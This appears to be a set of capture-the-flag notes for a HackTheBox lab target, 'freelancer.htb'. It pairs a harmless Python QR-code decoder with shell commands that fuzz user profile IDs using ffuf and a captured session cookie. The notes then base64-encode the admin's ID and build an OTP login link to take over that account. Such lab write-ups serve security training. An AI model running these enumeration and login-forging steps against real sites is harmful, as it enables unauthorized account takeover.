==========(1)======================================================================================================================
#Sample Python script to read a QR code image and extract the URL from it using the qrcode library and Pillow for image handling:

from PIL import Image
import qrcode
import cv2
import numpy as np

def decode_qr_code(image_path):
    """
    Decodes a QR code from the given image file.

    :param image_path: Path to the QR code image
    :return: Decoded data or an error message
    """
    # Load the image using OpenCV
    image = cv2.imread(image_path)
    
    # Initialize the QRCodeDetector
    detector = cv2.QRCodeDetector()
    
    # Detect and decode the QR code
    data, vertices, _ = detector.detectAndDecode(image)
    
    if vertices is not None:
        return data
    else:
        return "No QR code detected in the image."

# Test the function
if __name__ == "__main__":
    # Specify the path to your QR code image
    qr_image_path = "path_to_qr_code_image.png"
    
    # Decode the QR code
    result = decode_qr_code(qr_image_path)
    
    # Print the extracted data
    print("Decoded QR Code Data:", result)

How It Works:
Pillow (PIL): Used for handling images if needed for further manipulation.
OpenCV: The QRCodeDetector is used to detect and decode QR codes from the image.
Input: Provide the path to your QR code image.
Output: The URL or data contained in the QR code.
Requirements
Install the necessary libraries:
pip install opencv-python-headless Pillow

Usage
Replace path_to_qr_code_image.png with the actual path to your QR code image and run the script. If the image contains a QR code with a URL, it will print the extracted URL.
==========(2)======================================================================================================================
#Linux command to generate numbers from 1 to 65535 and redirect them to a file
seq 1 65535 > numbers.txt
==========(3)======================================================================================================================
#Use BurpSuite to find sessionid and csrftoken and then use it for FUZZ
ffuf -u 'http://freelancer.htb/accounts/profile/visit/FUZZ/' -X GET -H 'Cookie: sessionid=4p6yyd6c1zosaiuqzfvm3xuu9nr8k08g;csrftoken=uClh0dyORb2wtB2zqDYdxc6YZuGftsE5' -w /home/mabali/numbers.txt -v
==========(4)======================================================================================================================
#find the admin page and convert page number to base64
printf "%d" 2 | base64
==========(5)======================================================================================================================
#use scanqr code to get link content
echo "http://freelancer.htb/accounts/login/otp/Mg==/43c1fd8315d35368f280e7298fdab3a8/"



